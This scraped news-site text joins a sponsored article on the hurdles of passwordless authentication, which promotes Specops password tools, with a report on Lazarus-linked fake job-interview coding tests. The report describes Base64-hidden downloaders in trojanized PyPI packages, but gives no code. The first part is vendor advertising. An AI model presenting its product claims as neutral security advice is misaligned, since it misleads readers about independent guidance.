*   **Reduced IT burden:** Passwordless solutions promise to lighten IT teams' administrative load by decreasing password reset requests and related support tickets.

Interested to know how many of your end users are currently using breached or compromised passwords? Run a read-only scan of your Active Directory today – download Specops Password Auditor for free.

**The challenges of going passwordless**

Despite the benefits, organizations face numerous challenges when considering a move to passwordless authentication:

1.  **Legacy system compatibility:** Many businesses rely on a mix of modern and legacy systems — some of which may not support passwordless authentication methods. And updating or replacing these systems can be costly and time-consuming, often requiring significant changes to existing infrastructure.
2.  **User adoption and training:** While passwordless methods may be intuitive to tech-savvy users, they can confuse others. Your organization may need to invest in comprehensive training to ensure all employees can effectively use the new authentication system.
3.  **Backup authentication methods:** Even with passwordless primary authentication, most systems still require a backup method — which tends to be a traditional password. This means passwords don't truly disappear; they just become less visible, potentially leading to weaker security practices around these "hidden" passwords.
4.  **Biometric data privacy concerns:** Many passwordless solutions rely on biometric data, such as fingerprints or facial recognition. This raises important questions about data privacy and storage. Your organization must carefully consider the legal (and ethical) implications of collecting and managing this type of sensitive information.
5.  **Hardware requirements:** Some passwordless solutions require specific hardware, such as fingerprint readers or security keys. Equipping your organization with these devices can be expensive, especially if you have a large or distributed workforce.
6.  **Interoperability challenges:** In environments where employees need to access multiple systems and applications, it can be tricky for your IT team to ensure seamless interoperability between different passwordless solutions.
7.  **Regulatory considerations:** Depending on your industry and location, your business may face regulatory requirements that impact your choice of authentication methods. Some regulations may mandate specific security measures or data protection practices that could influence your decision between passwordless and traditional password systems.

**Strategies to improve password security**

Given these challenges, your organization may find that enhancing your existing password security measures is a more practical, cost-effective solution. To boost your current password security efforts, consider implementing these strategies:

*   **Enforce robust password policies:** Implementing strong password requirements — like minimum length and complexity — can improve your security. But remember: frustrated end users look for password policy workarounds. Balance your need for security with usability by encouraging the creation of passphrases.
*   **Use multi-factor authentication (MFA):** Adding an additional layer of security through MFA can reduce the risk of unauthorized access, even if a password is compromised.
*   **Employ password management tools:** Password management solutions can help your employees quickly generate and store strong, unique passwords for all their accounts, lessening the risk of password reuse.
*   **Provide regular security training:** Educating your end users about password hygiene best practices and how to recognize phishing attempts can reduce security breaches.
*   **Continuously monitor for compromised credentials:** Consider implementing solutions to detect and alert when employee credentials appear in known data breaches. This early warning will allow you to mitigate potential threats quickly.

To further enhance your efforts, your organization may want to integrate specialized tools into your security strategy. For example, tools like Specops Password Policy work with Active Directory to enhance password security across your organization.

With Specops Password Policy, you can:

*   Customize password complexity requirements
*   Give users real-time feedback during password creation
*   Detect and prevent the use of compromised passwords
*   Gain insights with detailed reporting and compliance tools

By implementing a tool like Specops Password Policy, your business can improve its password security posture without completely overhauling its authentication systems. This approach provides a balanced solution that addresses your immediate security needs while helping your business prepare for future authentication technologies.

**A balanced approach to passwords vs. passwordless**

While passwordless authentication is appealing, it remains a long-term goal for many organizations rather than an immediate solution. The implementation challenges — from legacy system compatibility to user adoption — make it a complex, potentially expensive endeavor.

In the meantime, your business can enhance password security by developing robust policies, deploying multi-factor authentication to gain another layer of protection, and investing in specialized tools like the Specops Password Policy. This balanced approach will help you achieve security benefits without having to completely shift your organization's security approach.

_Ready to enhance your password security? Try Specops Password Policy for free._

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Why Is It So Challenging to Go Passwordless?

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.
"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.
The activity has been assessed to be part of

Malware / Software Development

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.

"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.

The activity has been assessed to be part of an ongoing campaign dubbed VMConnect that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.

The use of job interviews as an infection vector has been adopted widely by North Korean threat actors, either approaching unsuspecting developers on sites such as LinkedIn or tricking them into downloading rogue packages as part of a purported skills test.

These packages, for their part, have been published directly on public repositories like npm and PyPI, or hosted on GitHub repositories under their control.

ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.

"The malicious code is present in both the \_\_init\_\_.py file and its corresponding compiled Python file (PYC) inside the \_\_pycache\_\_ directory of respective modules," Zanki said.

It's implemented in the form of a Base64-encoded string that obscures a downloader function that establishes contact with a command-and-control (C2) server in order to execute commands received as a response.

In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.

This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding "that ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system."

Some of the aforementioned tests claimed to be a technical interview for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors are impersonating legitimate companies in the sector to pull off the operation.

It's currently not clear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn, as recently also highlighted by Google-owned Mandiant.

"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.

The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).

Some of these attacks also entail the propagation of a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. The activity has been linked to a sub-cluster tracked as puNK-003, per S2W.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Latest News